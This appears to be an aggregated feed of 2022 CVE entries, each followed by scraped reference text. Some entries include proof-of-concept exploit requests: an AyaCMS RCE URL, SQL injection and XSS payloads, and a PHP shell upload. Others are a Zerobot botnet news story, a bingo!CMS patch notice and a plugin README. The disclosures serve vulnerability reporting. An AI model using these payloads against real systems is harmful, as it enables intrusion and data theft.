Skycaiji v2.5.1 was discovered to contain a deserialization vulnerability via /SkycaijiApp/admin/controller/Mystore.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-44351: Skycaiji has a deserialization vulnerability in v2.5.1 · Issue #46 · zorlan/skycaiji

AyaCMS 3.1.2 is vulnerable to Remote Code Execution (RCE).

Request the url below.

http://localhost/ajax.php?fun=diy\_save&tpl\_file=\[%22aya/template/default/footer.html%22\]&diy={%22t%22:\[%22t%22,%22c2b8cc463f0243617d136a57b8ef0e3a\_0%22,%22{\\%22pars\\%22:\\%22t\\%22,\\%22name\\%22:\\%22t%27,%27%27}{system(%27id%27)}{\\%22}%22\]}

CVE-2022-45550: AyaCMS has an Unauthorized Remote Code Execution Vulnerability

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=services/view_service&id=.

Permalink

Cannot retrieve contributors at this time

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: ep0ch

Login account: admin/admin123 (SuperAdmin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php 8.1 version

Vulnerability File: /php-sms/admin/services/view\_service.php

Vulnerability location: /php-sms/admin/?page=services/view\_service&id=

Vulnerability Parameter: id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=services/view\_service&id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+

exp:

    GET /php-sms/admin/?page=services/view_service&id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1
    Host: 192.168.1.88
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
    Connection: close

CVE-2022-44393: vul_report/SQLi-1.md at main · Serces-X/vul_report

An issue was discovered in ZZCMS 2022. There is a cross-site scripting (XSS) vulnerability in admin/ad_list.php.

**ZZCMS the lastest version download page :**

http://www.zzcms.net/about/download.html

software link: http://www.zzcms.net/download/zzcms2022.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**Essential information**

version:2022  
File path:admin/ad\_list.php  
parameter:page  
request method:REQUEST  
payload:1");alert(/xss/);("

**Principle analysis**

admin/ad\_list.php line 17  
Get the parameter(page) through the REQUEST method and pass the parameter to the checkid () function.

inc/function.global.php line 14  
Let's see the checkid () function again. The content of the ID parameter comes from the page parameter obtained by the request method. The function first determines whether the ​ID is a number. If it is not a number, it executes the showmsg() function and passes the $ID to the showmsg() function.

inc/function.php line 23  
See the showmsg() function, in which line 24, you can execute malicious code by closing the alert() function  
for example：payload=");alert("1");("

**Loophole recurrence**

First log in to the website：http://localhost/admin/login.php

Access:http://localhost/admin/ad_list.php?page= ");alert(/xss/) ;(", and then two pop-up windows will pop up. The second pop-up content is the detection content.

CVE-2022-44361: ZZCMS2022 has a xss · Issue #1 · cri1stur/ZZcms

A cross-site scripting (XSS) vulnerability in Book Store Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Level parameter under the Add New System User module.

\> \[Suggested description\]

\> A cross-site scripting (XSS) vulnerability in Book Store Management

\> System v1.0.0 allows attackers to execute arbitrary web scripts or HTML

\> via a crafted payload injected into the Level parameter under the Add

\> New System User module.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> Cross Site Scripting (XSS)

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> https://www.sourcecodester.com

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Book Store Management System - V 1.0.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> Level

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Local

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> https://www.sourcecodester.com/php/15748/book-store-management-system-project-using-php-codeigniter-3-free-source-code.html

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Sanjay Singh

CVE-2022-45217: CVE-2022-45217/CVE-2022-45217 at main · sudoninja-noob/CVE-2022-45217

The botnet exploits flaws in various routers, firewalls, network-attached storage, webcams, and other products and allows attackers to take over affected systems.

A new botnet is attacking organizations through various vulnerabilities in Internet of Things (IoT) devices from D-Link, Huawei, RealTek, TOTOLink, Zyxel, and more, posing a critical threat that allows attackers to take over vulnerable systems, researchers have found.

The botnet, dubbed Zerobot and written in the Go programming language, includes modules capable of self-replication and self-propagation, as well as attacks for different protocols, a researcher from Fortinet shared in a blog post published Dec. 6.

"Zerobot targets several vulnerabilities to gain access to a device and then downloads a script for further propagation," Fortinet Labs senior antivirus analyst Cara Lin wrote in the post.

So far, researchers have seen two versions of the botnet, one that they began tracking on Nov. 18 and a more sophisticated version that appeared soon after, on Nov. 24, that added a string of new capabilities.

The first version of Zerobot was quite basic, but attackers quickly updated it to include a "selfRepo" module that allows it to reproduce itself and infect more endpoints with different protocols or vulnerabilities, researchers said. The latest version — on which their analysis is based — also includes string obfuscation and a copy file module.

**Attack Mode**

Zerobot initiates an attack by first checking its connection to 1.1.1.1, the DNS resolver server from Cloudflare. It then copies itself onto the targeted device based on the victim's OS type, with different tactics depending on the platform, researchers said.

For Windows, Zerobot copies itself to the "Startup" folder with the filename "FireWall.exe." If the targeted platform is Linux, it has three file paths — "HOME%," "/etc/init/," and "/lib/systemd/system/."

Once it is copied onto the targeted device, Zerobot then sets up an "AntiKill" module to prevent users from disrupting its program once it's started. "This module monitors a particular hex value and uses 'signal.Notify' to intercept any signal sent to terminate or kill the process," Lin wrote.

After initialization, Zerobot starts a connection to its command-and-control (C2) server, ws\[:\]//176\[.\]65\[.\]137\[.\]5/handle, using the WebSocket protocol.

Once it sets up a communication channel, the client waits for a command from the server to unleash any of 21 exploits for various vulnerabilities found in IoT products, as well as some others — including the Java framework vulnerability Spring4Shell, phpAdmin, and F5 Big — "to increase its success rate," Lin wrote.

**Enterprises: Take Immediate Action**

Fortinet included a list of the numerous vulnerabilities that Zerobot exploits, which are found in assorted devices including routers, webcams, network attached storage, firewalls, and other products from a host of well-known manufacturers. 

Lin advised any organization using these devices to update to the latest versions or apply any available patches immediately. Indeed, with businesses losing up to $250 million a year on unwanted botnet attacks, according to a report published last year from Netacea, organizations would be wise to evaluate their environments to discover any device that might be vulnerable to Zerobot, she noted.

"Users should be aware of this new threat, patch any affected systems … running on their network, and actively apply patches as they become available," Lin wrote.

Zerobot Weaponizes Numerous Flaws in Slew of IoT Devices

Authentication bypass using an alternate path or channel vulnerability in bingo!CMS version1.7.4.1 and earlier allows a remote unauthenticated attacker to upload an arbitrary file. As a result, an arbitrary script may be executed and/or a file may be altered.

bingo!CMSのバージョン

必要な対策

　特記事項

v1.7.4以降

【提供するファイル】  

・bingo!CMSv1.7.4.2バージョンアップパッチ

【作業内容】

・パッチファイル・フォルダ数点のアップロード

【バージョンアップライセンス料金】

・無償

bingo!CMSv1.7.xは現行バージョンのため、バージョンアップライセンスは無償です。

代行作業は有償（1サイトにつき税込16,500円〜）にて承ります。  

バージョンアップ手順のご参考（バージョンアップツールに同梱されているマニュアルと同じものです）  

bingo!CMSv1.7.4.2へバージョンアップするにはPHP5.6以上のサーバー環境が必要です。

v1.7.0 - v1.7.4未満

【提供するファイル】

・bingo!CMSv1.7.4.2パッケージ

・バージョンアップツール

【作業内容】

・パッケージファイルのアップロード

・バージョンアップツールの実行

【バージョンアップライセンス料金】

・無償

v1.6.x

【提供するファイル】

・bingo!CMSv1.7.4.2パッケージ

・バージョンアップツール

・ライセンスファイル

【作業内容】

・パッケージファイルのアップロード

・バージョンアップツールの実行

・ライセンスファイルの差し替え

【バージョンアップライセンス料金】

・無償

bingo!CMSv1.6.xのバージョンアップライセンスは通常 税込8,800円（一般価格）ですが、bingo!CMS1.6.xは製品公式サポート対象バージョンであること、また、脆弱性対策の重要性を考慮し、今回は無償にてご用意いたします。

代行作業は有償（1サイトにつき税込16,500円〜）にて承ります。

バージョンアップ手順のご参考（バージョンアップツールに同梱されているマニュアルと同じものです）  

bingo!CMSv1.7.4.2へバージョンアップするにはPHP5.6以上のサーバー環境が必要です。

v1.5以下

【提供するファイル】

・bingo!CMSv1.7.4.2パッケージ

・バージョンアップツール

・ライセンスファイル

【作業内容】

・パッケージファイルのアップロード

・バージョンアップツールの実行

・ライセンスファイルの差し替え

・スキンの修正

【バージョンアップライセンス料金】

・有償（右記参照）

bingo!CMSv1.5以下は製品の公式サポートが終了しているため、バージョンアップを特に強く推奨いたします。

バージョンアップライセンスの一般価格は以下の通りです。

・v1.5プラス　税込11,000円

・v1.5.x　税込23,320円

・v1.4以下　税込41,800円

代行作業は有償（1サイトにつき税込16,500円〜）にて承ります。

また、v1.5以下のスキンはbingo!CMSv1.7.4.2との互換性が無く改修作業が必要となるため、改修作業料金を別途お見積りいたします。

バージョンアップ手順のご参考（バージョンアップツールに同梱されているマニュアルと同じものです）  

bingo!CMSv1.7.4.2へバージョンアップするにはPHP5.6以上のサーバー環境が必要です。

CVE-2022-42458: 【重要・要対応】bingo!CMS 認証回避脆弱性に関する対応をお願いいたします

External initialization of trusted variables or data stores vulnerability exists in WordPress Popular Posts 6.0.5 and earlier, therefore the vulnerable product accepts untrusted external inputs to update certain internal variables. As a result, the number of views for an article may be manipulated through a crafted input.

**WordPress Popular Posts**

A highly customizable widget that displays your most popular posts.

**Table of contents**

*   Description
*   Features
*   Requirements
*   Installation
*   Usage
*   Support
*   Contributing
*   Changelog
*   License

**Description**

WordPress Popular Posts (from now on, just _WPP_) is a highly customizable widget to showcase the most commented / viewed entries on your WordPress powered site.

**Features**

*   **Multi-widget capable** - You can have several WordPress Popular Posts widgets on your blog, each with its own settings!
*   **Time Range** - List those posts of your blog that have been the most popular ones within a specific time range (eg. last 24 hours, last 7 days, last 30 days, etc)!
*   **Custom Post-type support** - Want to show other stuff than just posts and pages, eg. Popular _Products_? You can!
*   **Thumbnails!** - Display a thumbnail of your posts! (_see the FAQ section for more details_.)
*   **Statistics dashboard** - See how your popular posts are doing directly from your admin area.
*   **Sorting options** - Order your popular list by comments, views (default) or average views per day!
*   **Custom themes** - Out of the box, WordPress Popular Posts includes some themes so you can style your popular posts list (see Widget Themes for more details).
*   **Use your own layout!** - WPP is flexible enough to let you customize the look and feel of your popular posts! (see customizing WPP's HTML markup and How to style WordPress Popular Posts for more.)
*   **Advanced caching features!** - WordPress Popular Posts includes a few options to make sure your site's performance stays as good as ever! (see Performance for more details.)
*   **REST API Support** - Embed your popular posts in your (web) app! (see REST API Endpoints for more.)
*   **Disqus support** - Sort your popular posts by Disqus comments count!
*   **Polylang & WPML 3.2+ support** - Show the translated version of your popular posts!
*   **WordPress Multisite support** - Each site on the network can have its own popular posts list!
*   **Shortcode support** - Use the \[wpp\] shortcode to showcase your most popular posts on pages, too! For usage and instructions, please refer to the Usage section.
*   **Template tags** - Don't feel like using widgets? No problem! You can still embed your most popular entries on your theme using the wpp_get_mostpopular() template tag. Additionally, the wpp_get_views() template tag allows you to retrieve the views count for a particular post. For usage and instructions, please refer to the Usage section.
*   **Localization** - Translate WPP into your own language.
*   **WP-PostRatings support** - Show your visitors how your readers are rating your posts!

Looking for a **Recent Posts** widget just as featured-packed as WordPress Popular Posts? **Try Recently**!

**Requirements**

*   WordPress 5.3 or newer.
*   PHP 7.2 or newer.
*   Mbstring PHP Extension.
*   Since WordPress Popular Posts writes constantly to the database to keep track of page views, InnoDB support is required.

**Installation****Automatic installation**

1.  Log in into your WordPress dashboard.
2.  Go to Plugins > Add New.
3.  In the "Search Plugins" field, type in **WordPress Popular Posts** and hit Enter.
4.  Find the plugin in the search results list and click on the "Install Now" button.

**Manual installation**

1.  Download the plugin and extract its contents.
2.  Upload the wordpress-popular-posts folder to the /wp-content/plugins/ directory.
3.  Activate the **WordPress Popular Posts** plugin through the "Plugins" menu in WordPress.

**Done! What's next?**

1.  Go to Appearance > Widgets, drag and drop the **WordPress Popular Posts** widget to your sidebar. Once you're done configuring it, hit the Save button.
2.  If you have a caching plugin installed on your site, flush its cache now so WPP can start tracking your site.
3.  If you have a plugin that minifies JavaScript (JS) installed on your site please read this FAQ: Is WordPress Popular Posts compatible with plugins that minify/bundle JavaScript code?
4.  If you have a security / firewall plugin installed on your site, make sure you allow WPP access to the REST API so it can start tracking your site.
5.  Go to Appearance > Editor. Under "Templates", click on header.php and make sure that the <?php wp_head(); ?> tag is present (should be right before the closing </head> tag).
6.  (Optional but highly recommended) Are you running a medium/high traffic site? If so, it might be a good idea to check these suggestions to make sure your site's performance stays up to par.

That's it!

**Usage**

WPP can be used as a WordPress Widget, which means you can place it on any of your theme's sidebars (and it even supports multiple instances!) However, you can also embed it directly in posts / pages by using the WordPress Popular Posts block or via shortcode; or anywhere on your theme using the wpp_get_mostpopular() template tag.

... and there's even more on the **Wiki** section, so make sure to stop by!

**Support**

Before submitting an issue, please:

1.  Read the documentation, it's there for a reason. Links: Requirements | Installation | Wiki | Frequently asked questions.
2.  If it's a bug, please check the issue tracker first make sure no one has reported it already.

When submitting an issue, please make sure to include the following:

1.  WordPress version.
2.  WPP version.
3.  Are you using the widget or the shortcode/template tag?
4.  Describe what the issue is (include steps to reproduce it, if necessary).

**Contributing**

*   If you'd like to support my work and efforts to creating and maintaining more open source projects your donations and messages of support mean a lot! Ko-fi | Buy me a coffee | PayPal Me
*   If you have any ideas/suggestions/bug reports, and if there's not an issue filed for it already (see issue tracker), please create an issue so I can keep track of it.
*   Developers can send pull requests to suggest fixes / improvements to the source.
*   Want to translate WPP into your language or update a current translation? Check if it's already supported or download this POT file to translate the strings (see I want to translate your plugin into my language / help you update a translation. What do I need to do? for more).

**License**

GNU General Public License version 2 or later

Copyright (C) 2008-2022 Héctor Cabrera - https://cabrerahector.com

The WordPress Popular Posts plugin is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

The WordPress Popular Posts plugin is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with the WordPress Popular Posts plugin; if not, see http://www.gnu.org/licenses.

CVE-2022-43468: GitHub - cabrerahector/wordpress-popular-posts: WordPress Popular Posts - A highly customizable WordPress widget that displays your most popular posts.

Online Leave Management System v1.0 was discovered to contain an arbitrary file upload vulnerability at /leave_system/classes/SystemSettings.php?f=update_settings. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

vulnerability location：There is an arbitrary file upload vulnerability in the "Settings" module in the background management system

    POST /leave_system/classes/SystemSettings.php?f=update_settings HTTP/1.1
    Host: localhost
    Content-Length: 4027
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    Accept: */*
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTRvq9tuWvBA7y1xY
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/leave_system/admin/?page=system_info
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=29pn5i5a8eeab4dp29po24hgn5
    Connection: close
    
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="name"
    
    Online Leave Management System - PHP
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="short_name"
    
    OLMS - PHP
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="about_us"
    
    <p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer vel pharetra elit. Suspendisse potenti. Quisque aliquam justo ut ipsum porta ullamcorper. Curabitur ac lectus hendrerit, tristique sem in, cursus sapien. Vivamus metus augue, pharetra ac lobortis vel, eleifend sed diam. Sed lacus mauris, dictum eget est in, maximus egestas arcu. Nunc vel est ut est elementum laoreet. Phasellus quis tincidunt ex. Morbi vestibulum molestie turpis, id pellentesque augue viverra in. Donec laoreet lorem id viverra molestie. Vivamus in odio sed lectus ultricies eleifend. Nunc eget erat blandit, tristique odio nec, blandit purus. Vivamus facilisis laoreet ex, vel ultricies nisl molestie in. Proin laoreet finibus nulla quis auctor. Etiam pulvinar ligula et diam tincidunt dapibus.</p><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;">Nulla pulvinar nisl nec neque mollis imperdiet. Curabitur dignissim convallis arcu, a maximus neque dictum id. Praesent justo libero, semper sed auctor eu, ultricies id quam. Sed et orci non sem imperdiet lobortis at non mi. Suspendisse consectetur consectetur dolor, interdum imperdiet orci venenatis nec. Sed vehicula orci sollicitudin facilisis ultricies. Mauris non nibh nec orci convallis mollis ac in lectus. Cras eu cursus urna, non semper mi. Ut in tortor in odio feugiat interdum. Integer ut ante non purus luctus maximus eu vitae nulla. Nam quam felis, condimentum non molestie sed, ornare at nunc. In rhoncus mi id justo gravida congue.</p>
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="files"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="img"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="cover"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY--
    
    

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-45009: bug_report/UPLOAD.md at main · realguoxiufeng/bug_report

Simple Phone Book/Directory Web App v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter at /PhoneBook/edit.php.

**Simple Phone book/directory Web App v1.0 by bakhtiar has SQL injection**

BUG\_Author: realguoxiufeng

vendors:https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html

Vulnerability File: /PhoneBook/edit.php

GET parameter 'editid' exists SQL injection vulnerability

Payload1: /PhoneBook/edit.php?editid=1'

    GET /PhoneBook/edit.php?editid=1' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

sql statement error

Payload2: /PhoneBook/edit.php?editid=1''

    GET /PhoneBook/edit.php?editid=1'' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

Page successfully displayed

Payload3: /PhoneBook/edit.php?editid=1%27%20AND%20(SELECT%202%20FROM%20(SELECT(SLEEP(10)))A)--%20B

    GET /PhoneBook/edit.php?editid=1%27%20AND%20(SELECT%202%20FROM%20(SELECT(SLEEP(10)))A)--%20B HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

The server's response time is 10 seconds

Tag

#php